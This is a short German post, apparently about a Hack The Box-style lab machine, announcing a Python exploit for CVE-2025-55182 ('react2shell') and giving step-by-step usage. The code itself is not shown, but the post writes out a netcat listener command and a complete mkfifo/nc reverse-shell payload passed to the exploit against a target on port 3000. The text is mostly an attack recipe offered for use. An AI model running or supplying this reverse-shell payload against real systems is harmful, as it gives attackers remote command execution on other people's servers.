
Ich habe einen einfachen react2shell CVE-2025-55182 Python-Exploit erstellt
Ich habe einen einfachen react2shell CVE-2025-55182 Python-Exploit erstellt. VERWENDUNG
Speichern Sie das Skript: Speichern Sie den obigen Code als exploit.py.
Aktualisieren Sie die Hosts: Stellen Sie sicher, dass reactor.htb in Ihrer /etc/hosts-Datei auf die Ziel-IP aufgelöst wird. echo "<TARGET_IP> reactor.htb" | sudo tee -a /etc/hosts
Starten Sie den Listener: Öffnen Sie ein Terminal, um die Reverse Shell zu empfangen. nc -lvnp 4444
Führen Sie den Exploit aus: Führen Sie das Skript mit einem Reverse-Shell-Payload aus. python3 exploit.py http://reactor.htb:3000 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <YOUR_IP> 4444 >/tmp/f"
Ersetzen Sie <YOUR_IP> durch Ihre tun0-IP-Adresse.